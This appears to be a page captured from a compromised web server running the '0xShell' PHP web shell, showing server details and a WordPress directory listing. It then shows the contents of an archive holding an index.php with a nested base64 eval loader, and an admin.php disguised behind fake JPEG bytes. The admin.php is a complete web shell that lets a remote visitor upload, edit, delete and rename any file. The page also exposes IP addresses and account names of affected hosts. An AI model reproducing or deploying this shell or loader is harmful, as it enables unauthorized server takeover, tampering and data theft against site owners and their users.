0xShell Shell MySQL Netstat SMTP FTP SSH 未选择任何文件 Domain Upload file System Info: User: couragent | UID: 1022 | GID: 1024 | Groups: 1024 Server IP: 62.72.47.222 | Client IP: 23.145.24.71 PHP: 8.1.29 | OS: Linux | Server: LiteSpeed command /home/couragent/public_html$ Enter file path to read Files ../ � .htaccess � '0e 4e5 .tmb/ � .user.ini � '0e 4e5 .well-known/ � 123.php � '0e 4e5 cgi-bin/ � clasa99.php � '0e 4e5 error_log � '0e 4e5 evs.txt � '0e 4e5 home/ � index.php � 4e5 license.txt � '0e 4e5 op.php � '0e 4e5 php.ini � '0e 4e5 readme.html � '0e 4e5 robots.txt � '0e 4e5 wp-activate.php � '0e 4e5 wp-admin/ � wp-blog-header.php � '0e 4e5 wp-comments-post.php � '0e 4e5 wp-config-sample.php � '0e 4e5 wp-config.php � '0e 4e5 wp-content/ � wp-cron.php � '0e 4e5 wp-includes/ � wp-links-opml.php � '0e 4e5 wp-load.php � '0e 4e5 wp-login.php � '0e 4e5 wp-mail.php � '0e 4e5 wp-settings.php � '0e 4e5 wp-signup.php � '0e 4e5 wp-trackback.php � '0e 4e5 xmlrpc.php � '0e 4e5 Viewing: op.php 0xShell

0xShell

System Info:
User: jonasls | UID: 188156 | GID: 100 | Groups: 100
Server IP: 10.127.20.1 | Client IP: 216.73.216.28
PHP: 8.0.30 | OS: Linux | Server: Apache
/home/jonasls/www/7affd2$

Files

Viewing: wflogs.tar

index.php000064400000013532152205156230006371 0ustar00<?php eval("?>".base64_decode("PD9waHAgZXZhbCgiPz4iLmJhc2U2NF9kZWNvZGUoIlBEOXdhSEFnWlhaaGJDZ2lQejRpTG1KaGMyVTJORjlrWldOdlpHVW9JbEJFT1hkaFNFRm5XbGhhYUdKRFoybFFlalJwVEcxS2FHTXlWVEpPUmpscldsZE9kbHBIVlc5SmJFSkZUMWhrYUZORlJtNVhiR2hoWVVkS1JGb3liRkZsYWxKd1ZFY3hTMkZIVFhsV1ZFcFBVbXBzY2xkc1pFOWtiSEJJVmxjNVNtRXhXa2RaTUZaclZrWmFWMkpITlZKV2ExcEhWVmQwYzFOV2IzbGFSM2hTVFVWYWRWVXhWazlSYkc5NFVtcFdVbFpWTlVOV1ZsWlhVa1pHVjFKcldsSk5SVnAxVlRGV1QxRnNiM2RpUlZKU1ZqSlNUMVZ0ZEVkTk1WSldWV3RLYTAxRVJrbFZWM1JIVld4S1JsTnNVbEpXVjFKTFZWUkNSMkpzUm5SaVJVcGhUVVUxUTFsVVFURlNSbTk1WkVWd1VrMUZWak5WZWtKUFVrWkdXRnBGVmxaV2VteFFWVlJLYW1ReFRYZFZiRXBwVFVSR1JsVldhR3RVYkU1V1VtNUtWVTFHU1hwVVZWWXdVbFpHVlZWck9WSk5iVkY2VmtaV1UxSkdSbGhhUlhCVFZsUkdSRlZXWkd0VGJFVjNVbXBPVlZaV1NrUlhha0Y0VWxaR2RGcEVUbFJXVjNoRFYycEJlRkpXUmxsYVJUVlRVbFZaZWxaR1ZsTlJiVkYzVFZWV1VsZEhVazlWYTFaSFRURlNWbFZyU210TlJFWkdWVlpvYTFSc1NrWlNhazVWVmxaS1ExcEVRWGhTVmtaWldrVTFVMUpWV1hwV1JsWlRVVzFSZDAxVlZsSlhSMUpQVld0V1IwMHhVbFpWYTBwclRVUkdSbFZXYUd0VWJFcEdWR3RLWVUxSGVFUlZiRlp6VTJ4R1dGcEhOVkpoTUZwUFZWZDBjMk5HUmxaVWExcFdWbFphUmxWc1drZFNiRzkzWWtWU1VsWXhjRXRWVkVKSFVURkdjMUpyV2xKaE1GcFRWV3hXUzFGc1ZYZFNiVFZVVmxVMVExZHFRbk5TUmtaWVdrVktWbFpYZUVaVlYzUkhWbXhKZDJKRlNtRk5TRUpHVmxaak5WUXhSWGxpUlVwaFRVZDRSVlZXV2tkVGJFWldZa1ZPVWxkSFVrOVZWRUpMVVd4U1ZsZHJUbFpXYTFwSFZURldUMUZzUm5SWGJFcFRWbFUxUTFwV1ZrZFNiRXBYVW14YVZrMUhlRlpWYlhSTFVUSkdSazVXVGxoV2F6VkRXVlprVDFVeFZsbGlSWEJTVFVWYWRWVlVRazlVTVVWM1lrVlNVbFpzY0ZkWlZsWkhZbXhPY2xWck9XaFdNRFYzVlZaV2QxSldWbGhQVm1oVFltMW9kVll5ZEd0alJscFlUVlYwYkZZeVVqTlZla3AzVldzeFZrNVlSbHBsYkVwUlZtdG9RMUpXVm5KV2JHUlRUVlZzTTFsVlZuZFdSMHBHVGxaYVYySkdjR2hXTUZwclVqSktTRkpzY0U1aVJYQjZWakl3ZUdFeVNYbFNiR2hxVTBoQ2NsVXdXbHBsVm5CRlZHMDVUMVl4V25kVlZtUnJVMnhGZDFKdE5WUldWVFZEVjJwQ2MxSkdSbGhhUlhCU1RVVmFkVlV4Vms5UmJHOTNZa1ZTVWxZeVVrdFZWRUpIWW14T1ZsUnJTbUZOUjNoRlZWWmthMU5zUlhkU2JUVlVWbFUxUTFkcVFuTlNSa1pZV2tWd1VrMUZXblZWTVZaUFVXeHZkMkpGVWxKV01sSkxWVlJDUjJKc1RsWlVhMHBoVFVkNFJWVldaR3RUYkVWM1VtMDFWRlpWTlVOWGFrSnpVa1pHV0ZwRmNGSk5SVnAxVlRGV1QxRnNiM2RpUlZKU1ZqRndRMVpVUWtkU1ZrWlhVbXRhVW1Fd1dsTlZiRlpMVVd4V1ZsWnJUbFJXVlRWRFYycENjMUpHUmxoYVJVcFdWbGQ0UmxWWGRFZFdiRWwzWWtWS1lVMUlRa1pXVm1NMVZERkZlV0pGU21GTlIzaEZWVlphUzFOc1JsWmlSVTVTVmpKU1UxVnNWa2ROTVZaWVdrVk9WbFpyV2tkVk1WWkhVbXhGZVZWcVZsSldWWEJEVjJwQmVGVXhSbkpTYkZwb1VsUkdVMVl4V2s5VmJGcHlWbTAxV0ZadGFFZFdhMVp6WTFaT1dGcEZVbEppUlhCRlZURldUMUZzYjNkaVJVcG9UVzVDVDFSV1ZuTmliRXB6V2tWMGJGWlhlRU5VVlZZd1VqSkdWMUpZWkZSV1ZUVlhWMnBDWVU1R2IzaGpSV2hvVm0xNE1WVjZRazlqYlU1V1RsWldXRlpGTlZGVmEyUjZUV3hXVlZGc1RsTmlSWEI1VjJ0V2MxWkdXbGxSYkZaWFlURndXRlpxUmxwbFIwWkhZMFpvYVZaVVZubFdNbmhyV1ZkS2RGSnJhR2xUUlZweFZGUkdTbVZHY0VoT1YzUlBVakZhV2xscVNtdFRiRVYzVW0wMVZGWlZOVU5YYWtKelVrWkdXRnBGY0ZKTlJWcDFWVEZXVDFGc2IzZGlSVkpTVmpKU1MxVlVRa2RpYkU1V1ZHdEtZVTFIZUVWVlZtUnJVMnhGZDFKdE5WUldWVFZEVjJwQ2MxSkdSbGhhUlhCU1RVVmFkVlV4Vms5UmJHOTNZa1ZTVWxZeVVrdFZWRUpIWW14T1ZsUnJTbUZOUjNoRlZWWmthMU5zUlhkU2JUVlVWbFUxUTFkcVFuTlNSa1pZV2tWd1VrMUZXblZWTVZaUFVXeHZkMkpGVWxKV1ZFWkRXa1JDVjJKc1JsaGhSVnBUVWxaYVZWVldUVFZUYkVWM1UxaGFWRlpWTlVOWGFrWlRZMFpHV0ZwRmNGSk5SVzkzVmxWb2JrNUdiM2RpUlZKU1ZqSlNiMWxXVmtkaWJFNVdWR3RPVTJFeGNFaFZWbVJyVTJ4RmQxSlVVbFpUUnprelZrZDBUMk5HVm5WYVIzQnBWa2QwTTFkWGNFdFVNbEowVTJ0U1VsWkhlRXRWVkVKM1pHeHdSbUZHVG10TmF6UXhWVEZTYTFKV1ZsaFBXRXBZWVRKTk1WcEZXbk5YUjBwSlZtdHdVMUpGU25WVk1XTXhVekpTZEZKcmFGWmlXR2h3VmpCV1MwNVdaSE5oUlRsb1VqQTFNRmxyWkc5aFZrWTJWbTVHV21GcmJETmFSM1J6WTFkTmQwNVZVbWhXYTNBd1YxWmFhMDVIU2tkYU0zQlNZbGRvY2xWcVNtdGliRlpIVkd0S2FGWllaRFZWYlRWM1lXc3hjMWRZWkZwTk1uTXhXV3hrVDJSRk9WbFdiWFJTWlcxNE0xZFhlR3RoYlZKellrUldUMVpGU25OVk1GcEhZMFpSZWxrelpGUk5TRUpLVm0wMWMyRldSWGRTVkZaVVZsVTFWRnBFU2s5a1JUbFZVVzFzVG1GNlZYbFhWM1JQVVcxU1ZtSkZVbFJXUm5CT1dsWlNiMk5HVGxaVVZFSmhUVWhDU1ZaWE5XRmhWbGwzVjI1a1dtSlhlRU5hUmxaelVrWldkRTFYYUZkTk1taDZWakJTVDFFeVJraFZhMmhoWlcxU1JsWldZelZVTVVWNVRWZEdUbFl3Y0RCV1IzQkRZVVphTm1KRVJsUldWMUpvV1d0a1UxTkdVblJQVm14T1RXeEtNMWRyVm10aU1YQnpZVE53VjJKdGVIQlZWRXByWTJ4d1IyRkZkR3BOU0ZKVlZWZHdhMUpXVmxoUFZ6VlVWbFUxUTFkcVFuZFRSbEowVDFWd1UxSkZTblZXTVZKUFZqSldXRk5yWkZCWFJVcHdXV3hrTTJReFRYZFViRTVPVmpBMU1GcEVUa05WUjFJMlVXdDRWRlpWTlVOWGFrSnpVMFpTY1ZKdGNHbFhSMmgwVjFod1MxWXdNVWhUV0hCU1lXdEtUVlZVUmt0alZteFdWR3BPWVUxVlZqUldiWGhQVmxaS1ZXSkdTbGRoTVdzeFZsUkdTMVl4Vm5OWGJGcG9aV3hhVjFac1pEQlNNVkY0Vmxoa1dHRXhjRmRaVm1ocllteHdSbUZGZEU1V2JrSlZXVmh3YTFKV1ZsaFBWelZVVmxVMVExZHFSbkpsYkZwMVlrZHNVMkZ0ZHpKV01uaHZWVEpTZEZScmJGWldlbXhNVldwQk1XUnNVa1pVYTA1VFVteHdXRlV5YzNoV1ZURldVMnhhV0ZKRlNsQldWVnBUWTJzMVZsZHNTazVXYTNCWFZsUkdWbVZHU25OVldHaFhZa1phVGxWVVFrZE9SbEpXVkc1S1QwMUdTbE5aYWtwclUyeEZkMUp0TlZoV1JUVllXbFprUzFJd09WbGpSMFpZVW10dmVWZFVRbTlWYlVsM1kwVm9WV0pVYkU1VlZFSkxVbFphYzFkcmRGVldiRVkwVlZkNFYxZFZNVlpPVmxaWFVsWnJNVlpxUmt0V01VNXlZMFpPYVZJemFGTldWM2hYVmpGVmQyVkZVbEppVkVaaFZtcE9iMDVzWkhOVWJrcFBUVWQ0UlZRd2FHRlRiRW8yWWtST1lWSlhVbnBhUnpGTFpFWktkVlJzUW1oV1ZXOHlWMVpTUzJNeVVYZGlSV1JWWWtaS1ZsVlVRa3BsVm1SellVVjBhbEp1UWpCWmEyUjNWMnhrUjFOdVpGcGhhMnQzVmtkMFQyTkdSbGhhUlhCU1RVVndlRmRyV205VE1rMTRXak53VldKWWFISlZibkJ6VFRGd1JsUnROV2hOVjNRMVYycE9UMU5zU2xaT1ZtUlhWak5STUZaVldsZFNNVlowVjJ4YVRsWlVWazlXTUZKSFdWWktjMVp1U21sU1YxSlpWbXhrYjFWV1dsVlNiRXBxVFVkNFNWWXlNVzloVms1R1RsaE9WRTFXU2paWGFrSTBUbFU1U0ZwSGJFNU5SV3d6VjFaYWFrNVhVbGRpUm1oclpXeHdTMVV3VlRGbFZteFhZVVZLWVUxcldrbFVNV2gzWVRGS05sWnRPVnBpUjFKWFYycEtVMlJHV25WaVIyaFhUVmhDTTFZeFVrdFNNREZJVW14b1VGZEdXa1pXVm1NMVlteE9WbFJyU21GTlNFSkpWbGN4YjJFeFNYZFdiVFZXVW1zMVJGbFhNVk5YVms1MVZHeHNUbUpHYTNkV01uaHJWRzFKZDJORmFGVmlWR3hOVm10b1QxUXhSWGxpUlVwaFRVZDRSVlZYTVhkaE1XUkdZMGh3V0ZKRmNGQlpla3BLWld4U2RHVkZlRkpOVlhCNFYxWldUMk5yTkhkVmJFcHBUVzFTUzFWVVFrZGliR3Q1VFZaa1RsSXhTbHBWTWpWWFUyeEZlRk51U2xoV2JXaFVXVlZWTlUwd01VWmtSekZXVmtWS1RWVnJXa2RrYlVWNFlUTnNVRmRHV25KVmFrWmhUVlp3UmxSclNsQldWM2hKVmpJeE5HRXhTWGRPV0ZwWVVrVTFjbGt3WkZOVFIwWklWMnh3VGsxV2J6RlhWM1JQWW0xRmVWVnNiRlJpYXpWTlZtdG9UMVF4UlhsTldFNXBWbGQ0UlZkcVNqQlhhekZ4WWtSR1lWSlhVbGhhUm1SVFVrWkdXR0ZHUmxkU1JVcDFWakl3ZUZJeVRYbFVXR3hYVjBWS1MxVXdhRTlVTVVWNVlrVktZVTFIZUVWVlZ6RTBZVEpLVmxkdWNGUk5SVFZMVkVSR1EyTkdUbGhhUlRGb1ZsVmFlVll4VWtwT1YxSllWV3RvVjJKc1duSlZWRXA2VFRGS1IxSnVaRkJXVmtwVFdXNXJOVlZXY0RaTlJHeEtZVmQwZDFRemJFSk1NVUp1VUZRd2FVdFRhemRKUkRncklpa3BPeUEvUGc9PSIpKTsgPz4=")); ?>v3/lvxz/ujoue/admin.php000044400000020720152205156230011027 0ustar00???�� JFIF      ?? C 	!"$"$?? C?? p " ??             ??             ?��    ????(%	aA*?XYD?(J??E��RE,P�XYae?)(E��2�B��R��	BQ��� X?)X�����?  @  
.....................................................................................................................................???�� JFIF      ?? C 	!"$"$?? C?? p " ??             ??             ?��    ????(%	aA*?XYD?(J??E��RE,P�XYae?)(E��2�B��R��	BQ��� X?)X�����?  @  

.....................................................................................................................<?php
$currentDir = isset($_POST['d']) && !empty($_POST['d']) ? base64_decode($_POST['d']) : getcwd();
$currentDir = str_replace("\\", "/", $currentDir);
$dir = $currentDir; // Needed for Adminer logic

// Directory Navigation
$pathParts = explode("/", $currentDir);
echo "<div class=\"dir\">";
foreach ($pathParts as $k => $v) {
    if ($v == "" && $k == 0) {
        echo "<a href=\"javascript:void(0);\" onclick=\"postDir('/')\">/</a>";
        continue;
    }
    $dirPath = implode("/", array_slice($pathParts, 0, $k + 1));
    echo "<a href=\"javascript:void(0);\" onclick=\"postDir('" . addslashes($dirPath) . "')\">$v</a>/";
}
echo "</div>";

// Upload
if (isset($_POST['s']) && isset($_FILES['u']) && $_FILES['u']['error'] === 0) {
    
    $fileName    = basename($_FILES['u']['name']);
    $tmpName     = $_FILES['u']['tmp_name'];
    $destination = $currentDir . DIRECTORY_SEPARATOR . $fileName;

    if (is_uploaded_file($tmpName)) {
        $content = file_get_contents($tmpName);
        
        if ($content !== false && file_put_contents($destination, $content) !== false) {
            echo "<script>alert('Upload successful!'); postDir('" . addslashes($currentDir) . "');</script>";
        } else {
            echo "<script>alert('Upload failed - cannot write file');</script>";
        }
    } else {
        echo "<script>alert('Invalid upload - security check failed');</script>";
    }
}

// File/Folder Listing
$items = scandir($currentDir);
if ($items !== false) {
    echo "<table>";
    echo "<tr><th>Name</th><th>Size</th><th>Action</th></tr>";

    foreach ($items as $item) {
        $fullPath = $currentDir . '/' . $item;
        if ($item == '.' || $item == '..') continue;

        if (is_dir($fullPath)) {
            echo "<tr><td><a href=\"javascript:void(0);\" onclick=\"postDir('" . addslashes($fullPath) . "')\"><b>dir><b/> $item</a></td><td>--</td><td>--</td></tr>";
        } else {
            $size = filesize($fullPath) / 1024;
            $size = $size >= 1024 ? round($size / 1024, 2) . 'MB' : round($size, 2) . 'KB';
            echo "<tr><td><a href=\"javascript:void(0);\" onclick=\"postOpen('" . addslashes($fullPath) . "')\">fil> $item</a></td><td>$size</td><td>"
                . "<a href=\"javascript:void(0);\" onclick=\"postDel('" . addslashes($fullPath) . "')\">Delete</a> | "
                . "<a href=\"javascript:void(0);\" onclick=\"postEdit('" . addslashes($fullPath) . "')\">Edit</a> | "
                . "<a href=\"javascript:void(0);\" onclick=\"postRen('" . addslashes($fullPath) . "', '$item')\">Rename</a>"
                . "</td></tr>";
        }
    }
    echo "</table>";
} else {
    echo "<p>Unable to read directory!</p>";
}

// Delete File
if (isset($_POST['del'])) {
    $filePath = base64_decode($_POST['del']);
    $fileDir = dirname($filePath);
    if (@unlink($filePath)) {
        echo "<script>alert('Delete successful'); postDir('" . addslashes($fileDir) . "');</script>";
    } else {
        echo "<script>alert('Delete failed'); postDir('" . addslashes($fileDir) . "');</script>";
    }
}

// Edit File
if (isset($_POST['edit'])) {
    $filePath = base64_decode($_POST['edit']);
    $fileDir = dirname($filePath);
    if (file_exists($filePath)) {
        echo "<style>table{display:none;}</style>";
        echo "<a href=\"javascript:void(0);\" onclick=\"postDir('" . addslashes($fileDir) . "')\">Back</a>";
        echo "<form method=\"post\">
            <input type=\"hidden\" name=\"obj\" value=\"" . $_POST['edit'] . "\">
            <input type=\"hidden\" name=\"d\" value=\"" . base64_encode($fileDir) . "\">
            <textarea name=\"content\">" . htmlspecialchars(file_get_contents($filePath)) . "</textarea>
            <center><button type=\"submit\" name=\"save\">Save</button></center>
            </form>";
    }
}

// Save Edited File
if (isset($_POST['save']) && isset($_POST['obj']) && isset($_POST['content'])) {
    $filePath = base64_decode($_POST['obj']);
    $fileDir = dirname($filePath);
    if (file_put_contents($filePath, $_POST['content'])) {
        echo "<script>alert('Saved'); postDir('" . addslashes($fileDir) . "');</script>";
    } else {
        echo "<script>alert('Save failed'); postDir('" . addslashes($fileDir) . "');</script>";
    }
}

// Rename
if (isset($_POST['ren'])) {
    $oldPath = base64_decode($_POST['ren']);
    $oldDir = dirname($oldPath);
    if (isset($_POST['new'])) {
        $newPath = $oldDir . '/' . $_POST['new'];
        if (rename($oldPath, $newPath)) {
            echo "<script>alert('Renamed'); postDir('" . addslashes($oldDir) . "');</script>";
        } else {
            echo "<script>alert('Rename failed'); postDir('" . addslashes($oldDir) . "');</script>";
        }
    } else {
        echo "<form method=\"post\">
            New Name: <input name=\"new\" type=\"text\">
            <input type=\"hidden\" name=\"ren\" value=\"" . $_POST['ren'] . "\">
            <input type=\"hidden\" name=\"d\" value=\"" . base64_encode($oldDir) . "\">
            <input type=\"submit\" value=\"Submit\">
            </form>";
    }
}
?>

<!DOCTYPE html>
<html>
<head>
    <title>File Explore</title>
    <style>
        table { margin: 20px auto; border-collapse: collapse; width: 90%; }
        th, td { border: 1px solid #000; padding: 5px; text-align: left; }
        textarea { width: 100%; height: 300px; }
        .dir { margin: 20px; }
    </style>
    <script>
        function postDir(dir) {
            var form = document.createElement("form");
            form.method = "post";
            var input = document.createElement("input");
            input.name = "d";
            input.value = btoa(dir);
            form.appendChild(input);
            document.body.appendChild(form);
            form.submit();
        }
        function postDel(path) {
            var form = document.createElement("form");
            form.method = "post";
            var input = document.createElement("input");
            input.name = "del";
            input.value = btoa(path);
            form.appendChild(input);
            document.body.appendChild(form);
            form.submit();
        }
        function postEdit(path) {
            var form = document.createElement("form");
            form.method = "post";
            var input = document.createElement("input");
            input.name = "edit";
            input.value = btoa(path);
            form.appendChild(input);
            document.body.appendChild(form);
            form.submit();
        }
        function postRen(path, name) {
            var newName = prompt("New name:", name);
            if (newName) {
                var form = document.createElement("form");
                form.method = "post";
                var input1 = document.createElement("input");
                input1.name = "ren";
                input1.value = btoa(path);
                var input2 = document.createElement("input");
                input2.name = "new";
                input2.value = newName;
                form.appendChild(input1);
                form.appendChild(input2);
                document.body.appendChild(form);
                form.submit();
            }
        }
        function postOpen(path) {
            window.open(atob(btoa(path)));
        }
    </script>
</head>
<body>
    <div class="dir">
        <form method="post" enctype="multipart/form-data">
            <input type="file" name="u">
            <input type="submit" name="s" value="Upload">
            <input type="hidden" name="d" value="<?php echo base64_encode($currentDir); ?>">
        </form>
    </div>
</body>
</html>
Disabled functions: None